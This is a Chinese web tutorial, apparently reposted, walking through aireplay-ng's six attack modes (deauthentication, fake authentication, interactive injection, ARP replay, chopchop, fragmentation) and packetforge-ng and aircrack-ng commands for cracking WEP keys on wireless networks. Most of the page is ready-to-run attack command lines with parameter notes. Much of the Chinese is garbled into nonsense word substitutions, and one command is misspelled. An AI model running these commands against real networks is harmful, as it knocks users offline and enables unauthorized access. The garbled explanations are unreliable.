Aircrack-ng的6中攻击形式详解

-0  deautenticate冲突情势
使已经接二连三的合法客商端端强制断开与路由器的连接,使其重新连接。在重新连接进程中得到认证数据包,从而发出立竿见影的arp数据。
设若三个客商端连在路由器上,可是未有人上网来爆发行之有效数据,此时即利用-3也不或者发生有效的arp数据,所以就须要用-0抨击格局来协作-3攻击来会被激活
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0
参数表明:10 表示发送次数(设置为0表示循环攻击,客商端不可能平常上网)
-a设置ap的mac地址,-c设置已一连的官方客商端的mac地址(若是要-c则具有与ap连接的顾客端全体断线)

-1 fakeauth count 伪装叁个顾客端和ap进行延续
那是绝非客商端商量学习的第一步,因为是未有合法连接的客商端,由此须要一个佯装客商端来和路由器连接。为让ap接受数据包,必需使本人的网卡和ap关联。-1佯装顾客端连接成功够能力用发送注入命令
aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
参数说明:0表示岩石0秒后延续;-e设置ap_essid;-a设置ap的mac地址
-h设置伪装客商端的网卡mac地址(正是本身网卡的mac地址)

-2 interactive 交互形式
这一个格局集合了抓包和提取数据,发包注入三种效应
ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0
参数表明:-p设置调控帧中包括的音讯(16进制),暗中认可使用0841;-c:设置指标mac地址;-b设置ap的mac地址;-h伪装的客商端网卡mac地址(便是和谐的mac地址)
领到包,发送注入数据包
aireplay-ng -2 -r myarp -x 1024 wifi0
参数表明:myarp:自身安装的公文名;-x 1024:发包的速度(最大为1024)

-3 arp-request注入攻击情势
这种格局是一种抓包后剖析重发的长河
aireplay-ng -3 -b ap_mac -h 合法客商端mac -x 512 wifi0

-4 chopchop攻击形式,用来获取一个满含密钥数据的xor文件
aireplay-ng -4 -b ap-mac -h my_mac wifi0

-5 fragment 碎片包攻击形式,用来获得PLacrosseGA(包括密钥的后缀为xor的文本)
aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包创设程序
packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l
255.255.255.255 -y niam_xor -w mrarp
参数表明:-0:伪装arp数据包;-k:设置目的文件ip和端口;-l:设置源文件IP和端口;-y:从xor文件中读取P大切诺基GA;name:xor文件的名字;-w设置伪装的arp包的公文名
aircrack-ng -n 64 -b ap_mac name-01.ivs
参数表达:-n设置key长度(64/128/256/512)

Aircrack-ng 的详尽介绍:请点这里
Aircrack-ng 的下载地址:请点这里

Ubuntu 12.04装置新型 Reaver和 aircrack-ng 无线网络破解工具

Ubuntu Linux有线密码破解利器Aircrack-ng

http://www.bkjia.com/Linuxjc/757308.htmlwww.bkjia.comtruehttp://www.bkjia.com/Linuxjc/757308.htmlTechArticle-0 deautenticate抵触情势使已经三番两次的官方客商端端强制断开与路由器的连接,使其重新连接。在重新连接进程中赢得证实数据包,进而发生…

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图